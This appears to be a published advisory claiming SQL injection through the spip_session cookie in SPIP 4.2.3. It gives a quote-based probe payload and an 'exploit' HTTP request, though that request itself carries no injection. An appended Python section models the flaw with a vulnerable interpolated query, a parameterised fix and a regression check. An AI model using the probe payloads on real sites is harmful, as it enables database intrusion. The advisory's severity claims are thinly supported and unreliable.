# SPIP 4.2.3 SQL Injection

SPIP version 4.2.3 suffers from a remote SQL injection vulnerability.
## Title: spip-v4.2.3 SQLi cookie session vulnerability - Server-Side Sensitive Information Disclosure!

## Author: nu11secur1ty

## Date: 06.28.2023

## Vendor: https://www.spip.net/en_rubrique25.html

## Software: https://files.spip.net/spip/archives/spip-v4.2.3.zip

## Reference: https://portswigger.net/web-security/information-disclosure

## Description:

The spip_session cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the spip_session cookie, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. Additionally, the payload `' and '8025'='8025` was submitted in the spip_session cookie, and a database error message was returned.

An attacker who holds an account can easily dump almost all sensitive information from the server. This stems from the wrong configuration of the sessions of this app and a serious bug in its backend execution-function modules, a bug introduced by the development team of this web application! No user account, nor even a broadcast admin account, must be able to see internal information of the server, except at the layer 2 level, which must be a LOCAL ADMINISTRATOR from the side of the developers of this web app.

STATUS: HIGH-CRITICAL Vulnerability

[+] Exploit:

```http
GET /pwnedhost7/ecrire/?exec=info HTTP/1.1
Host: 192.168.100.45
Cookie: spip_admin=%40pwned%40pwned.com; spip_accepte_ajax=1; spip_session=1_c9209323400f315bb516fdc7c5345eae
Cache-Control: max-age=0
Sec-Ch-Ua:
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: ""
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
```

## Reproduce:

[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/SPIP/spip-v4.2.3)

## Proof and Exploit:

[href](https://www.nu11secur1ty.com/2023/06/spip-v423-sqli-cookie-session.html)

## Time spent:

03:15:00
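The defect class the Description section reports (a session cookie interpolated into SQL, so one quote errors and two quotes do not) modelled as an added example with an in-memory SQLite table; this is not SPIP's code or schema, and the `<digits>_<32 hex>` cookie shape used for input validation is an assumption taken from the request above.

```python
import re
import sqlite3

# Constructed stand-in for a session store keyed by the cookie value; an
# illustrative model, not SPIP's real schema or lookup code.
SAMPLE_TOKEN = "1_" + "ab" * 16  # constructed token in the 1_<32 hex> shape seen in the request

def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE sessions (id INTEGER, token TEXT)")
    db.execute("INSERT INTO sessions VALUES (1, ?)", (SAMPLE_TOKEN,))
    return db

def lookup_vulnerable(db, cookie):
    """Builds the query by string interpolation (the defect the advisory describes).
    Returns (row, error): a lone quote breaks the SQL and surfaces a database error."""
    try:
        return db.execute(f"SELECT id FROM sessions WHERE token = '{cookie}'").fetchone(), None
    except sqlite3.Error as e:
        return None, str(e)

def lookup_hardened(db, cookie):
    """Same lookup with a bound parameter: the cookie value can never alter the SQL."""
    return db.execute("SELECT id FROM sessions WHERE token = ?", (cookie,)).fetchone(), None

# Assumed cookie format (<digits>_<32 lowercase hex>), enforced as defence in depth
# before the value reaches the database at all.
SESSION_SHAPE = re.compile(r"^\d+_[0-9a-f]{32}$")

def looks_like_session_cookie(cookie):
    """Reject any spip_session value that does not match the expected shape."""
    return SESSION_SHAPE.fullmatch(cookie) is not None

def quote_differential(lookup, db):
    """The advisory's signal: one quote raises a DB error, two quotes do not.
    True means the lookup is building SQL from the raw cookie; use it as a
    regression check against your own data-access layer."""
    _, err_one = lookup(db, "'")
    _, err_two = lookup(db, "''")
    return err_one is not None and err_two is None
```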